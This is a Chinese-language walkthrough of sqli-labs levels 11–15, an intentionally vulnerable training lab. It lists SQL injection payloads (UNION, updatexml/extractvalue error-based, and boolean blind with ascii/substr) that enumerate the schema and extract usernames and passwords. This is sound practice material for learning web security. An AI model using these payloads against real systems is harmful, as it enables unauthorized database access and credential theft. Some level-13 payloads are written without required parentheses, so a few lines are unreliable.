sqli-labspage第十一关到第十五关

第十一关

一.判断闭合方式

闭合点为1'

1'union select 1,2#

二.查询数据库

1' union select database(),2#

三.查询user表里的所有列

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

 四.查询库里的所有表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
 

五.查出user表中所有数据 

1'union select group_concat(username),group_concat(password) from users#
 

第十二关

一判断闭合方式

闭合点为1")

1") union select 1,2#

二查询数据库 

1") union select database(),2#

 三.查询库里所有表名 

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

 四.查询user表里的所有列

1") union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

五.查询user表中所有数据 

1") union select group_concat(username),group_concat(password) from users#

第十三关

一.判断闭合方式

闭合点是')

没有回显点，用报错注入吧

二.查询数据库

1')  and updatexml(1,concat(database()),1) #

三.查询库里所有表名

1')  and updatexml(1,concat(select group_concat(table_name)from information_schema.tables where table_schema='security'),1) #
 

四.suers表里所有列

1')  and updatexml(1,concat(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),1) #
 

 五.查询user表里所有数据

1')  and updatexml(1,concat(select group_concat(username)from users),1) #

第十四关

一.判断闭合方式

闭合方式为"

1" union select 1,2#

没有回显点，继续用报错注入

二.查询数据库

1" and extractvalue(1,concat(1,database())) #

三.查询库里所有表名

1" and extractvalue(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) #
 

四.查询user表里的所有列

1" and extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) #
 

五.查询user表里所有数据 

1" and extractvalue(1,concat(1,(select group_concat(username) from users))) #

第十五关

一.判断闭合方式

1' or 1=1#

 二.查询数据库长度

1' or length(database())>7

1' or length(database())>8

说明数据库长度为8 

二.判断数据库的第一个字符

1'or ascii(substr(database(),1,1))>114#

 1'or ascii(substr(database(),1,1))>115#

  

数据库第一位字符ascii码为115 's'。

.......

最终得出数据库名为security

三.查security数据库中表名的长度

1' or (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())>28#

1' or (select length(group_concat(table_name)) from information_schema.tables where table_schema=database())>29#

可通过这条命令去查表名 1' or (select ascii(substr((group_concat(table_name)),1,1)) from information_schema.tables where table_schema=database())>0 #

查表名可以用sacii表去进行查看 

四.查列名长度

1' or (select length(group_concat(column_name)) from information_schema.columns where table_schema=database() and table_name='users')>19#

 1' or (select length(group_concat(column_name)) from information_schema.columns where table_schema=database() and table_name='users')>20 #

 

可通过这条命令去查列名 

1' or (select ascii(substr((group_concat(column_name)),1,1)) from information_schema.columns where table_schema=database() and table_name='users')>0 #

查列名可以用sacii表去进行查看 

五.数据长度与数据名

与上述相同，同理可得：

数据长度：1' or (select length(group_concat(username,2,password)) from users)>0 #

数据：1' or (select ascii(substr((group_concat(username,2,password)),1,1)) from users)>0 #